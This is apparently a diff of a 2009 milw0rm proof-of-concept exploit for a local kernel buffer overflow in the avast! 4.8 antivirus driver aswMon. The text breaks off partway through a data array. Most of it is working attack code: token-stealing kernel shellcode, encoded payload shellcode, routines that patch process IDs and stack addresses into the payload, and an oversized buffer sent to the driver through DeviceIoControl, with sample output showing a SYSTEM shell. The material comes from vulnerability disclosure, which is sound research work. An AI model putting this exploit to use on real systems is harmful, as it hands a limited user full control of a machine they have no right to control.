0xa29ef00b, 0x0502a28d, 0x712f7787, - 0x5235ed70, 0x8945f3eb, 0x4f1ecbdd, 0xb5f457b9, - 0xe7327495, 0xbdc47980, 0x85bf54c1, 0xe054753d, - 0x42e6c82b, 0xb54389bb, 0xef5debf3, 0xcf310c8e, - 0x2a433c26, 0xf209dc9d, 0x8a869d03, 0x45961943, - 0x28f51bb9, 0x643e865c, 0xb410b2d1, 0xaf30a98c, - 0xa004bb79, 0x956b7c41, 0x13e3a21d, 0xca5f4efd, - 0xf13e81c1, 0x4fb74a1e, 0x2a033efb, 0x91ed2e36, - 0xb9bf8c57, 0xc1b65238, 0x2b3b3e0f, 0xbc02c76b, - 0xc56d0a7d, 0xb33685c2, 0x6619d068, 0x13ceb219, - 0x21e2d381, 0xbc04a013, 0xafc763ef, 0xc6c9651d, - 0x9139fb86, 0xdd6fe175, 0x5334d9d7, 0x4b39bc0e, - 0x42035a82, 0x91cba15e, 0xcf931d84, 0x739e2767, - 0x5a1c76fd, 0xd65cb444, 0x02c608e9, 0xc13aa613, - 0x5f9895ec, 0x05928739, 0xd960be14, 0xbc65f387, - 0xb40abdb8, 0x3833c113, 0x1fa8b468, 0x8e907e66, - 0xbca30fa5, 0xef539907, 0x3f130c64, 0xaf133b06, - 0x06d0d5c8, 0xe3e4f1df, 0x185f733d, 0x7ecf9d1e, - 0xdfea3362, 0x33bedbe3, 0xe9a15aed, 0x4aa68eeb, - 0x01e0aaf1, 0xb5ccf205, 0x9426c4cc, 0x3f80b9b4, - 0x017b584a, 0x7ac85b06, 0x4ca27f77, 0x7d8548a2, - 0x19025a74, 0x1d4d204c, 0x0cccb981, 0xf86a72e6, - 0x2a5ef939, 0x778bfe20, 0xf536a9e7, 0x82482d36, - 0x20a8484b, 0x8c08dd85, 0xc82a0739, 0xed52e038, - 0x4e6f5973, 0xd799c606, 0x87dd5c7f, 0x69db7ac2, - 0x56771978, 0xf682c73f, 0x40e5511c, 0xf373bc10, - 0xdecc0fa4, 0xf070df4e, 0x81b33f54, 0xf1d53816, - 0x2c2173e5, 0xae5a23d2, 0x0b9013fd, 0x9005857b, - 0x495aa603, 0x7d7b69b9, 0x80603698, 0xeedd2b37, - 0xaf7f72ea, 0xbe303f21, 0x0ea977f9, 0x0fa0708b, - 0xb5792aa6, 0x87fd2a7e, 0x2bda1cd6, 0x5df64225, - 0x216accb9, 0xc1808941, 0x582679b3, 0x46fbd44d, - 0xe2f76929, 0x548f6e51, 0x4ac3f5d8, 0xe52e62af, - 0x484110c2, 0x492fab5a, 0x2c7accea, 0x7488ca20, - 0xe36a2f99, 0xba1e3785, 0xefa467bc, 0xd4665fc8, - 0x2f5390e2, 0xfe450203, 0xbb624253, 0x551740a0, - 0x7d50b6c9, 0xe9d20aa0, 0x55e69c01, 0x6ab186ee, - 0x1c187ff3, 0x6ce6dff2, 0x120a6ce0, 0xf6c45fd2, - 0x5832b533, 0xb02e3027, 0x170d3041, 0x6f153144, - 0xad980d7f, 0x49f5d3ab, 0xcedca059, 0x3db83dc5, - 0x39c589c0, 0x986e3537, 0xc4d04f1d, 0xd71ee166, - 0x04620370, 0x35beb3cf, 0x39249667, 0x79915fe2, - 0xbe40d4da, 0xd0cab338, 0xdcb53b5a, 0xae884be7, - 0x6250a5df, 0x0949574e, 0x5d5321b8, 0x86d01394, - 0xd517473b, 0xe5f90827, 0x7a8ef843, 0x19869984, - 0x02e8d858, 0x71954f6f, 0x6a9e300b, 0xa8a50e6b, - 0xb935e9e2, 0x69f3e080, 0x3e51ad9b, 0xf485aa30, - 0x4195eb53, 0x2574950c, 0x87c2c9f1, 0x955cecec, - 0x2a89e224, 0x67aed18a, 0x8d473f2a, 0xa089d921, - 0x50197424, 0xa94cacbd, 0xe8cddf16, 0x806b7f0d, - 0xa27648b9, 0x99c702ad, 0x37db9034, 0xe7295b46, - 0xa4bf4bac, 0x43d214a3, 0x8d9bc127, 0x2f72faa5, - 0xf9143ef4, 0xf30bd7bf, 0x86b2517d, 0xb7a833d6, - 0x037c9b1f, 0x9459bc14, 0x0c78aa23, 0xe41cc7dc, - 0x4eda2ed2, 0x8c0a8f08, 0x85a8aff4, 0xae28e3ea, - 0x217269d6, 0x6d221bf7, 0x6f646c75, 0x8c04d0eb, - 0x7d389030, 0x1968785b, 0xe748befe, 0x7fb277a8, - 0xf340540e, 0xf5a6340f, 0x47113529, 0x0c2eab43, - 0xd20d8b05, 0x5306c40e, 0x9c0c1ad3, 0x52a384db, - 0x26ad4373, 0x30872280, 0xc5ef9754, 0x098568fa, - 0xcbc632de, 0x9efa321a, 0x8466cae3, 0x156fa462, - 0x96716caa, 0x3e7cd39b, 0x27506529, 0x34cac20d, - 0x05958b0a, 0xe3b1708f, 0x258ff2e9, 0x913cc9cb, - 0xa5899577, 0xb9885e7b, 0xa559f53e, 0x48d99696, - 0xf2d0826d, 0x0be5f805, 0x385bb433, 0x174121eb, - 0x58bfd2bd, 0x4f4bc6ff, 0xc8fb45a6, 0xfac1da99, - 0xcbb0841f, 0xd33a2a83, 0xdb808b49, 0x110544d1, - 0x3656b868, 0x9527fb34, 0x75d35656, 0xf683f9cc, - 0xe756e3f6, 0x8cf742c1, 0x60c64989, 0x2af6cecc, - 0x0c70ddbb, 0x761077ee, 0xa5b3e47e, 0x52939e81, - 0xa476a7db, 0x02afdf28, 0x181e76a1, 0x094c8ae4, - 0x2035542d, 0xc47a48ab, 0x5f344e89, 0x6c0eaf8d, - 0xed89747c, 0x718af660, 0xed1386e1, 0xfe37f3d2, - 0x06817e6b, 0x600c9381, 0xbab81e8f, 0xe7a49506, - 0xb5070118, 0x2cf72a58, 0xde08c7f4, 0x109eead3, - 0x38ca65ba, 0xab924774, 0x26e006f2, 0x52fc4fc1, - 0x2c4453a1, 0x700a621d, 0x014dc1dc, 0x3aef70de, - 0x7c87331d, 0x89433add, 0xcbf6a8fc, 0x114f4794, - 0xea4e637f, 0x723c4b76, 0x47cc4f6a, 0x87445530, - 0xe83ceb38, 0x4d3e048e, 0x79081724, 0x4bf787fb, - 0x68943c66, 0x40e3d968, 0x6b103a30, 0xaadd17d4, - 0xb3f839e8, 0xac84edf7, 0x931d53b1, 0x0c4d2a0e, - 0x2f6ce387, 0xfed92391, 0x69ee2a6e, 0x48d7bb98, - 0x0ba1cb35, 0x63e12f67, 0x1ce3cb82, 0x099b3a46, - 0x5839b9a4, 0x7f7f4993, 0x59e4ecea, 0xeea5cccd, - 0x447dbf7f, 0xcd8626e1, 0x8d36d4b0, 0xac9e19ec, - 0x797ab5d7, 0x8434b658, 0xbcec7ef7, 0x682c6d93, - 0x762d7c86, 0xf38c8099, 0xafdec42c, 0xc43d09a6, - 0xe49d1217, 0x5e747fe1, 0x24788bb3, 0xaefc2937, - 0x1932f03c, 0x683917c0, 0x66aeed2b, 0x9b18cdd7, - 0x33f680a8, 0x26951569, 0xbaee16a8, 0x9e6c211f, - 0x2588853b, 0x9f46290f, 0x246ae851, 0x18e204f6, - 0x4904ec8f, 0xd90aa3f4, 0xb32d3c27, 0x4c5dc284, - 0xbe4add7f, 0x43d09da9, 0x89c17c35, 0x073879e7, - 0xa563a12e, 0x8a89202c, 0xf15e9e1f, 0x351c54d9, - 0xa0c4fa14, 0x5709de8d, 0x39186894, 0x6d04f1d9, - 0xf11330f7, 0x81d6fb36, 0xa9ed69cb, 0xc6d525a7, - 0x7a95ed1d, 0x0e3cc7ca, 0xf22396d8, 0x454bc69f, - 0x220c180f, 0x413b363d, 0x3034f3b4, 0xd29d8cf2, - 0x54f88e88, 0x48701702, 0xd3bc5e71, 0x7d13dd70, - 0x3c60d934, 0x2f11eff3, 0xc0bfff93, 0xfa8a47f7, - 0x1ae1ec5d, 0xc5ebdc87, 0xe0f9d5ac, 0xf205ec31, - 0x45bf5abb, 0x364757d1, 0xe17d0824, 0x7285cdad, - 0x340f876f, 0xafd04fb5, 0x232b2753, 0x9ed7abb0, - 0xf6fa5267, 0xd0344840, 0x7e1908c7, 0xa7fa0e2a, - 0xa14a1f1c, 0x207f4d88, 0x3a8e8949, 0x0933e39b, - 0x49308b91, 0x744b2e05, 0x8dd691b5, 0x576003b6, - 0x74bf728b, 0x8ec344ea, 0x5c1a8d38, 0xba05b772, - 0xd025c49e, 0xbe9bde06, 0x791d3fde, 0xaac66591, - 0x4fd06cb7, 0x1eb57393, 0x3a132e66, 0x531bed33, - 0xc1161373, 0x584522c2, 0x96427532, 0x9b324e67, - 0x67fd675e, 0x1ca506c6, 0xfec4ce3f, 0xdfbd6229, - 0x1570062a, 0xaf2e42ce, 0x442de8ae, 0xe9da28c2, - 0xd8661dd6, 0xb1fbabfd, 0x5e3b5bd4, 0x5975312a, - 0x727c7734, 0x6edaf6d6, 0xc1c54cf1, 0x0a906333, - 0x81c044d6, 0x38ea12fe, 0x0c1bf270, 0x57818362, - 0x0908d11c, 0x0e5a84ec, 0xadc85814, 0x54e8aa92, - 0xd07c83f7, 0xcc71c686, 0x640e2cbb, 0x03c636a6, - 0x47737c01, 0x9ad77ee7, 0xd179e1a9, 0x8340bb15, - 0x489ed205, 0x40b54fa8, 0x7afb505e, 0xc04f8e16, - 0xb92981c6, 0x604af99f, 0x43c0fd25, 0x1d2b625f, - 0x13f4dcd7, 0xcf47b89b, 0x108d824a, 0x21236797, - 0x4cac84a5, 0xb33821ce, 0x542a9975, 0xf66135c2, - 0x30b9634a, 0x9bde472a, 0x50e29c43, 0x1224e64d, - 0x140aa049, 0x48c6d7eb, 0xf171704c, 0x80987f37, - 0x88da2c1d, 0xf337fbfe, 0xd52f414a, 0x76581549, - 0x75d22530, 0x293f3f41, 0x20b6cf21, 0xccd9f240, - 0x46ddeacd, 0x4e16d64e, 0x0e64fe89, 0x445de8d3, - 0x4d7983a6, 0x9f44fe8c, 0xf4e56281, 0xa7aad55b, - 0x07270a01, 0x77501d16, 0xf848ee54, 0x34f4ba27, - 0x244da047, 0x0ca62989, 0xbb5e2e05, 0x9612ca12, - 0x1b7c8cc7, 0xd2d672e6, 0x0caac1da, 0x1ae2cf8a, - 0x92bd47e9, 0xfeb1f194, 0xc0628cbd, 0xecc1a399, - 0x1a9f95f0, 0x29648b2b, 0x9c447a54, 0xad6d85e2, - 0x9bd983e7, 0x880f0eb1, 0xbea4a1a9, 0x3717e013, - 0x89e486dd, 0xe86bcc12, 0xc43fe5a5, 0xc50a72b4, - 0x396f4517, 0x2c8b865e, 0x3f022a7f, 0x0c5bc9bb, - 0x13fd077b, 0xcb6bd83d, 0x20c3e64b, 0x254e3a66, - 0xbcb22492, 0x57caa096, 0x8ba670d9, 0x547d5784, - 0xec8bf3f8, 0xf5b1ff55, 0x30620957, 0x43a3264a, - 0xdc6a0482, 0x270f2162, 0x15518268, 0xf4f3d923, - 0xfc6cdb9e, 0x91d3e097, 0xe49d4ba4, 0xe47a3b34, - 0xc18383a6, 0x5508af9a, 0xf2c8fcc8, 0xed417653, - 0xe3f4cf27, 0x6a777f65, 0xe9c3dae6, 0xfec2e74c, - 0x143f7e6d, 0xa8dc757c, 0xb8c48b07, 0x6a41964d, - 0x0994e2e4, 0x86ba5562, 0x4ebdb204, 0x6913dc92, - 0x3bd205a8, 0x2018395a, 0x804c5bb8, 0xa159fa18, - 0x7ccdfb1e, 0x146c6abc, 0x9c59a9ce, 0xe2f7d37d, - 0x699918e3, 0xde22536a, 0xfae6dd7c, 0x8a228eab, - 0xf657ae31, 0x97d59acb, 0xb1f6e1b7, 0xbc41be1c, - 0xc2572c95, 0x342f56a9, 0x349aeff3, 0xcbe3c7d9, - 0x080d46fe, 0x0e1d753c, 0xe4760d5c, 0x0cde715c, - 0x7d129f23, 0xab63fbbe, 0x9d734af8, 0xc2daebce, - 0x0619e8ee, 0x2c5b3a41, 0xd5db4193, 0x943fce43, - 0x0256feeb, 0x83a424bd, 0xe27f259b, 0x67ef724b, - 0x99c97ae1, 0x8bfa552e, 0x73e3191c, 0xe94365e5, - 0x92291d29, 0x7a28b911, 0x4ae8b691, 0xafba0345, - 0xbac0a0ba, 0x677713c2, 0x1a7fc599, 0x8978a9c1, - 0xe8f62f56, 0x58f7969a - }; - - DWORD ShellcodeToExecute; - - int choix; - memset(welcome, 0x61, 100); - welcome[100] = 0; - - ZeroMemory(out,sizeof(out)); - - printf("Avast Kernel Buffer Overflow Vulnerability\nProof Of Concept...\n\n"); - getch(); - - MajShellcode("LocalEscalation_Avast.exe"); - MajRealShellcode(); - MajRealStack(); - - ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE); - ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - - memcpy((void*)0x57523c00, UpdateAswMon, sizeof(UpdateAswMon)); - memcpy((void*)0x57523c00+sizeof(UpdateAswMon), ShellcodeMaster, sizeof(ShellcodeMaster)); - - printf("Connecting... "); - - hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); - while(hDevice == (HANDLE) 0xffffffff){ - hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); - Sleep(1000); - } - printf("Found !\nHandle : %p\n",hDevice); - - DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL); - DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL); - AfficherListeFichiers(); - printf("Written.\n"); - - CloseHandle(hDevice); - getch(); - return 0; -} - -// milw0rm.com [2009-08-24] +#include +#include +#include +#include +#include +#include + +/* +Program : avast! 4.8.1335 Professionnel +Homepage : http://www.avast.com +Discovery : 2009/07/29 +Author Contacted : 2009/07/31 +Found by : Heurs +This Advisory : Heurs +Contact : heurs@ghostsinthstack.org + + +//----- Application description + + +avast! antivirus software represents complete virus protection, +offering full desktop security including a resident shield. +This antivirus is certified by both ICSA Labs and West Coast +Labs Checkmark. + +//----- Description of vulnerability + +The File System Filter driver is prone to a local kernel buffer overflow. +This vulnerability allows an intruder to gain SYSTEM privileges on a Windows +system from a limited user account. + +//----- Proof Of Concept + +http://www.sysdream.com/LocalEscalation_Avast.rar + +//----- Credits + +http://www.sysdream.com +http://ghostsinthestack.org + +s.leberre at sysdream dot com +heurs at ghostsinthestack dot org + +//----- Greetings + +Virtualabs + + +//-----Exploitation + +############################################### +Avast Kernel Buffer Overflow Vulnerability +Proof Of Concept... + +===> Found : LocalEscalation_Avast.exe : 2676 + +Shellcode PID Uploaded ! +Shellcode Redirect Uploaded ! +Shellcode Stack Uploaded ! +Connecting... Found ! +Handle : 0000001C +Microsoft Windows XP [version 5.1.2600] +(C) Copyright 1985-2001 Microsoft Corp. + +C:\Documents and Settings\eleve\Bureau>whoami +SYSTEM +############################################### +*/ + +char UpdateAswMon [] = { + 0x5E, 0x81, 0xEE, 0x6B, 0x03, 0x00, 0x00, 0x81, 0xC6, 0x30, 0x9E, 0x00, 0x00, 0xC7, 0x06, 0x00, + 0x00, 0x00, 0x00 + }; + +char ShellcodeMaster[] = "\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00" +"\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b" +"\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08" +"\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03" +"\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22" +"\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35"; + +char RealShellcode[] = "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15" +"\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd" +"\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1" +"\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5" +"\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde" +"\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c" +"\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33" +"\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0" +"\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a" +"\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd" +"\x15\xf3\x1d\xb8"; + +int GetPidByName(char * name_Proc) { + PROCESSENTRY32 PEntry; + HANDLE hTool32; + + PEntry.dwSize = sizeof(PROCESSENTRY32); + hTool32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (hTool32 == INVALID_HANDLE_VALUE) { + printf("\nError ==> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)"); + getch(); + exit(0); + } + if(!Process32First(hTool32, &PEntry)) { + printf("\nError ==> Process32First(hTool32, &PEntry)"); + getch(); + exit(0); + } + if (!strcasecmp(PEntry.szExeFile, name_Proc)) { + printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID); + return PEntry.th32ProcessID; + } + //printf( "\n Process : PID\n"); + while(Process32Next(hTool32, &PEntry) != 0){ + if (strcasecmp(PEntry.szExeFile, name_Proc) == 0) { + CloseHandle(hTool32); + printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID); + return PEntry.th32ProcessID; + } + //printf("===> Trouver : %s : %d\n", PEntry.szExeFile, PEntry.th32ProcessID); + } + printf("\n%s n'a pas ete trouve.", name_Proc); + getch(); + exit(0); +} + +void MajShellcode(char * ProcessName){ + DWORD ProcessID; + DWORD MagicWord = 0x41414141; + int i; + + ProcessID = GetPidByName(ProcessName); + for (i=0; i> 8; + ShellcodeMaster[i+2] = ((DWORD) ProcessID & 0x00FF0000) >> 16; + ShellcodeMaster[i+3] = ((DWORD) ProcessID & 0xFF000000) >> 24; + printf("Shellcode PID Uploaded !\n"); + return; + } + } + printf("Shellcode PID NOT Uploaded :\'(\n"); + return; +} + +void MajRealShellcode(){ + int i; + DWORD MagicWord = 0x11111111; + + for (i=0; i> 8; + ShellcodeMaster[i+2] = ((DWORD) &RealShellcode & 0x00FF0000) >> 16; + ShellcodeMaster[i+3] = ((DWORD) &RealShellcode & 0xFF000000) >> 24; + printf("Shellcode Redirect Uploaded !\n"); + return; + } + } + printf("Shellcode Redirect NOT Uploaded :\'(\n"); + return; +} + +int FindStack(){ + __asm__( + "mov %eax, %esp\n\t" + "leave\n\t" + "ret\n\t" + ); +} + +void MajRealStack(){ + int i; + DWORD MagicWord = 0x22222222; + DWORD StackLocation = FindStack(); + + for (i=0; i> 8; + ShellcodeMaster[i+2] = ((DWORD) &StackLocation & 0x00FF0000) >> 16; + ShellcodeMaster[i+3] = ((DWORD) &StackLocation & 0xFF000000) >> 24; + printf("Shellcode Stack Uploaded !\n"); + return; + } + } + printf("Shellcode NOT Uploaded :\'(\n"); + return; +} + +void AfficherListeFichiers(void) { + HANDLE hFind; + WIN32_FIND_DATAW FindData; + char Dossier[1024]; + + // Change de dossier + SetCurrentDirectory(Dossier); + + // DÈbut de la recherche + hFind=FindFirstFileW(L"*.*", &FindData); + if (hFind!=INVALID_HANDLE_VALUE) + { + // Si le fichier trouvÈ n'est pas un dossier mais bien un fichier, on affiche son nom + printf("%ws\n",FindData.cFileName); + // Fichiers suivants + while (FindNextFileW(hFind, &FindData)) + { + printf("%ws\n",FindData.cFileName); + } + } + // Fin de la recherche + FindClose(hFind); +} + +int __cdecl main(int argc, char* argv[]) +{ + HANDLE hDevice = (HANDLE) 0xffffffff; + DWORD NombreByte; + DWORD InitVal=0; + char welcome[1024], out[50]; + DWORD Crashing []={ + 0x73d1dde9, 0x24135758, 0xcd62b301, 0x35a96b72, + 0x45c3745d, 0xcfae802b, 0xed77fbb8, 0xecc2f16d, + 0xa6409255, 0x5b608056, 0x7b2e40db, 0xc250e10c, + 0x284fc4b1, 0xbab9b00d, 0x2fce932c, 0x42d9380b, + 0x72b21bd3, 0x4646eb4c, 0xdfcc6996, 0x4060e991, + 0xce1fa555, 0xeda7ae0b, 0x4f918340, 0x90059feb, + 0xf4cf7bb7, 0x8b0c9a64, 0x9b99f867, 0xd673970a, + 0x591dbc4c, 0x2d54989b, 0xddb9c19d, 0x8121eaac, + 0x199b21f5, 0xc30a1e03, 0x7c618cb1, 0xeb3e06f0, + 0x7cebbd74, 0xaef8a969, 0x25cdcda9, 0xf47297c9, + 0x58855260, 0x9b494eaa, 0x0c11e290, 0x4f1a6361, + 0x75063159, 0xc791bf70, 0x3a1751db, 0xf439049a, + 0x83abe375, 0xba84ad33, 0x3ca8acac, 0x17d3fd7e, + 0x319c0280, 0xcd69a6c1, 0x3fdcdfe6, 0xc3903332, + 0x1377c51c, 0x1cd14365, 0xa98d77f0, 0xd5746f3f, + 0xb3cb7cb2, 0xddd2ecf4, 0x6cb9baa0, 0x4b0e045a, + 0x98b7c236, 0x1203e0e5, 0x32449810, 0xaeb428f7, + 0xa2e7e6e3, 0x3b0443af, 0x1145d62b, 0xaff5c263, + 0xc496b3d7, 0x0b1c45d9, 0x8a463e85, 0x041251c8, + 0x1341294d, 0xacc885c9, 0x03c3b5e7, 0x4cd36063, + 0xbeec4324, 0x313554a7, 0x3b202113, 0xe836e635, + 0x5d65c8bd, 0x8d52bae6, 0x24b3ba7f, 0x9b781fa7, + 0x7efa8335, 0x73e87501, 0x316fcbe4, 0xfcc446bc, + 0x3697162d, 0x5f706b56, 0x3d74846f, 0x57b41e55, + 0x44b39b19, 0x40e6bf38, 0xa1d3527c, 0x20f6b70c, + 0xa772ce22, 0x876cdf3b, 0xa948a3ad, 0x054c9fd6, + 0x6ea65a25, 0x432a376f, 0x4217baa1, 0xd38f0661, + 0x2c40d3d8, 0x33a62f9a, 0x5a8ef7d8, 0x4d07effa, + 0x8ba68789, 0x1441d661, 0xf2f6d48f, 0x77e5d2ae, + 0xcc69ac3e, 0x26cc9de9, 0xd7518e7e, 0xc568abea, + 0x21089cf3, 0xdc3c48a5, 0x6110d1b2, 0x39f65dc9, + 0xd0b8055d, 0xd8cab72c, 0x26be700a, 0x5f028b6c, + 0x1af4a25d, 0xbae98a7c, 0x1d5e94ed, 0xb743fb4a, + 0x274eaede, 0xe84bc6c6, 0xbcc3dd24, 0x47c6b5d5, + 0x3f5a530f, 0x4bbd205e, 0xe5ed455d, 0xc23908e3, + 0xa7255550, 0xfeee9e59, 0x8d91a28c, 0x27f1cd56, + 0xbb7d2468, 0x2e53ae6f, 0x3d8ea58a, 0x9832f31e, + 0x87aca912, 0xf5607f93, 0x67e4d74e, 0xcffd3adf, + 0x38bda32a, 0x1ace8bf1, 0x16ad790d, 0xe7b78a4a, + 0x6e4a4f52, 0xa963805f, 0xb44512ab, 0xaaff642a, + 0x68723e9a, 0x9cb006f2, 0x73439f5a, 0xcca9abc0, + 0x755ec72c, 0xb90d959c, 0x96f5fed2, 0x54821cac, + 0x6d3b9e97, 0x254fa473, 0xe5806bdf, 0x1d3fe779, + 0x5d824e9c, 0x0cba2490, 0x86dafdd4, 0xb84d19dd, + 0x1cf0ecc5, 0x73a4c777, 0x6545b564, 0x12fc70dd, + 0x58357dcd, 0x70524921, 0xa4bf0661, 0xd3630be2, + 0xb4f95085, 0x2f8e9f3f, 0x8fb2c303, 0x5d534373, + 0x330ed7be, 0x090a7fee, 0x70a0936f, 0x91bc5628, + 0x2ad2a9fb, 0x437d15d2, 0xcb860a99, 0x8bbf5d22, + 0x5188ce41, 0xf419337b, 0xfe338d2c, 0xf397167d, + 0xb79f4c9a, 0x982b7bd0, 0xeda0e308, 0x19079984, + 0x44506743, 0x08eb3bff, 0x0b2c7b5e, 0xfc12c449, + 0x122c18c3, 0xcb18effc, 0x65070b56, 0x5bbc5f36, + 0xba194a66, 0x1ac6b812, 0x4936b720, 0x3064f4d9, + 0xea85383a, 0x5669ab43, 0xbfb9b2be, 0x2c961814, + 0x2a16193f, 0x5310fc35, 0x2dcf5351, 0x8fb793bf, + 0x0b4f51df, 0x7f9c69f8, 0x76bbd7bc, 0xc2cd8ee9, + 0xdaded21e, 0xeeb83782, 0xa45e26a1, 0xa94133c2, + 0xaec536ad, 0xa6026a8c, 0xbcb5a191, 0xd7babca3, + 0xb2d31f46, 0x19511dc1, 0x21437e92, 0x0bfaa87e, + 0x32685945, 0x55016b49, 0x994f9293, 0x599f9653, + 0xc492d42b, 0xfa4d8907, 0x6c1e0416, 0x073e9847, + 0x9ceee897, 0x479dec42, 0x60f26898, 0xa0b37906, + 0x7f433088, 0xe617b52a, 0x30df4460, 0x9945c0da, + 0x5f4f9196, 0x5b3095ad, 0x41e4f285, 0x225b324a, + 0xe5f83ba7, 0xbadf8b56, 0xc732f28d, 0xaa94e0d7, + 0x0f9da105, 0x80936817, 0xa3b40d2e, 0xa7d5791c, + 0x10b0a9bb, 0x83b95622, 0x32872694, 0x7b1b3d10, + 0xe0e1adf8, 0x32512498, 0x6bc6ff89, 0x0d11fef7, + 0x3875c984, 0x5a31db0e, 0xdd1df94b, 0x61148636, + 0x7372b587, 0x8856950e, 0x4f0af062, 0xb49ea480, + 0x799ce35e, 0x23ecabd9, 0x137ee004, 0xdd17f948, + 0xf2026141, 0x8afd0e45, 0x1188ac9a, 0x0f87f038, + 0xee43edef, 0x982bf738, 0x78b3ca5f, 0x4d8345d3, + 0x613e2505, 0x16ab7e08, 0xa7e68888, 0xa59d234c, + 0x61655904, 0xbec0d39c, 0x3d0d18b0, 0x8eb7a653, + 0x6bd2ad6f, 0x3fa66b0f, 0x5951c36f, 0x8e5c4bed, + 0x087d3d72, 0x65fdb9b3, 0x7aa0c8a5, 0x26c78496, + 0x3a8946f1, 0xb65f63b2, 0xeacb180d, 0xbda32816, + 0x424f7b1e, 0x667fb713, 0xfe8d6f2c, 0x7f3711ca, + 0x477ecf54, 0xbf36b283, 0x92a7518e, 0xfa378a84, + 0x9ddc8f83, 0xc844b947, 0x3ef9ab12, 0xe892b5b4, + 0x101854b2, 0x8f45e397, 0xa1b134ed, 0x5c2a4d5c, + 0xa887258a, 0xbea01c90, 0xfb77c826, 0x08e87f98, + 0x6c7b0709, 0x1f27fe7d, 0xe9d4d75f, 0xd3ecbaee, + 0x961a35c6, 0x8317caf4, 0xc93141a0, 0x71c2fa12, + 0x79afe953, 0x7024a929, 0x5187beec, 0x439aa4c4, + 0x1b5bf729, 0x20de52a2, 0x5afd531b, 0xcbc6d1dc, + 0x8a6c775d, 0x93823634, 0x31e3c106, 0x5c4756ec, + 0xb322318f, 0x8a8fe323, 0x7d8a483f, 0x538d06a5, + 0xd23e0864, 0x07739d15, 0x46845d65, 0xa90ed2a1, + 0x907709ae, 0x25c51a18, 0x7b361c60, 0xf7f12530, + 0xb5c8b862, 0x1e5579b7, 0x453fde63, 0x5854951c, + 0xb479e4b4, 0x0187185f, 0xe310f406, 0xc5ae83f5, + 0x385149c8, 0xe0538b56, 0x6ffa1c0f, 0x15a8c111, + 0xb901feb0, 0x5cb53fcf, 0x7b9596dd, 0xbedc1ead, + 0x6ea7517e, 0xf1c88cdb, 0x2cf213af, 0x67ebce96, + 0x458465ce, 0x6503c018, 0xf7d61a9b, 0xbb31a712, + 0xe0dc951b, 0x354a28a8, 0x51ecebf3, 0xdbf8e424, + 0xd71a0cd2, 0x708d5b40, 0xdd1cf833, 0xb4be28a4, + 0x41c589c0, 0x5d81889f, 0x97de9f7a, 0x43b18278, + 0x4c312b46, 0x2ec1048d, 0x438d30d9, 0xab7923d6, + 0xd36d6ed0, 0xb6165ede, 0x95369795, 0xd5b1b776, + 0x60fe0b11, 0x087563ae, 0xa709eacf, 0xededbbea, + 0xf134d8ea, 0x1e241ce6, 0x341248d6, 0x6c16117a, + 0x7517ff23, 0x4dfb2eda, 0x7cc84423, 0x96cf942d, + 0x32901498, 0xe3bc3a5d, 0x0b85bdb2, 0x7baf09ca, + 0x6c7b4c01, 0xb3a72934, 0x4d33e464, 0x7dc1cf69, + 0x166756c6, 0x08f5f62f, 0x3db6b309, 0xce886208, + 0x1daf5a03, 0xc724741a, 0xf052f4ed, 0x4297acad, + 0xdc6a5dfe, 0xd0c4a895, 0x97db4437, 0x6e227c97, + 0x05f4dab0, 0x13b4adf4, 0x0d8b71e6, 0x9ff6843d, + 0x0fdb8939, 0x58850dfd, 0x2b21f28e, 0x2603e115, + 0xb09ba646, 0xd6fe719b, 0xe87a9223, 0x18f3b642, + 0x4fb62852, 0xeda5dd40, 0x6e5dbbf4, 0x703a2f1f, + 0x4884a549, 0xb6b85046, 0xdbbb7868, 0xa38e09a3, + 0x66c6fa13, 0xea16a377, 0x1ced6fd3, 0x44a3e920, + 0xfe995619, 0x822d3af3, 0xe8399736, 0xa6ff023c, + 0x19b88da8, 0x9b26e290, 0xc6970f3e, 0x4607d070, + 0x7db5bfd9, 0xbdcc2cd7, 